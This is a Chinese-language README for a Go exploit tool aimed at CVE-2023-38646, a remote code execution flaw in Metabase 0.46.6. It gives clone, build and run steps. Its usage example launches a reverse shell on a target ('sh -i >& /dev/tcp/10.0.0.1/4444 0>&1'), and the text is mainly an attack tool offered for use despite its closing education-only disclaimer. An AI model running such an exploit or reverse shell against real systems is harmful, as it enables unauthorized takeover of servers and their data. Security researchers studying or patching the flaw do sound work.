CVE-2023-38646 Metabase 0.46.6 漏洞利用工具
该工具利用软件平台中的一个漏洞(CVE-2023-38646)。该漏洞通过精心构造的请求,利用对数据库连接字符串处理不当的问题,实现远程代码执行。
该工具的功能:
克隆仓库:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [目标URL] --command [命令] [--proxy 代理URL]
目标URL:待扫描和利用的平台 URL。 命令:要在目标上执行的命令。 代理URL(可选):代理服务器的 URL(例如,http://127.0.0.1:8080)。如果未提供,则不使用代理。
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
该工具仅用于教育和研究目的。在扫描或利用任何目标之前,请务必确保您已获得适当的授权。滥用此工具严格违背开发者的意图,并可能构成违法行为。
欢迎针对任何反馈、错误或功能请求提交 issue。也随时欢迎提交 Pull Request!